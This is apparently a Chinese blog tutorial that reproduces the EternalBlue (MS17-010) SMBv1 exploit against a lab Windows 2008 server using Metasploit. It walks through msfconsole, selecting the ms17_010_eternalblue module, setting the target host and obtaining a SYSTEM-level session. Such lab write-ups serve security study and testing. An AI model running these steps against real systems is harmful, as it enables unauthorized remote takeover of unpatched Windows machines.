Metaspoilt对(永恒之蓝)ms17-010的复现检测

前言:

MS17-010是一个安全类型的补丁,MS17-010更新修复了 Microsoft Windows中的漏洞。
如果攻击者向Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。2017年,The Shadow Brokers决定公开一部分有价值的工具,其中“eternalblue”(永恒之蓝)就是其中之一(漏洞编号ms17-010)Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
漏洞影响:目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server2012 SP0。

复现利用:

攻击机:kali
靶机:win2008 server ip地址:192.168.107.164
第一步:打开msf,运行命令msfconsole
在这里插入图片描述
第二步:搜索ms17-010,命令search ms17-010
在这里插入图片描述
第三步:选择使用exploit/windows/smb/ms17_010_eternalblue 攻击模块,命令 use exploit/windows/smb/ms17_010_eternalblue ,然后执行options,查看该攻击模块需要的参数。
在这里插入图片描述第四步:设置Rhosts ,也就是靶机,命令 set Rhosts 192.168.107.164,设置好了以后,执行options查看参数是否 正确。
在这里插入图片描述第五步:确认无误后,run执行。
在这里插入图片描述
根据提示可以看到, host is likely vulnerable 说明漏洞是存在,并且是易攻击的,没过一会儿,msf中返回一个session。执行whoami 便是system最高权限。
在这里插入图片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章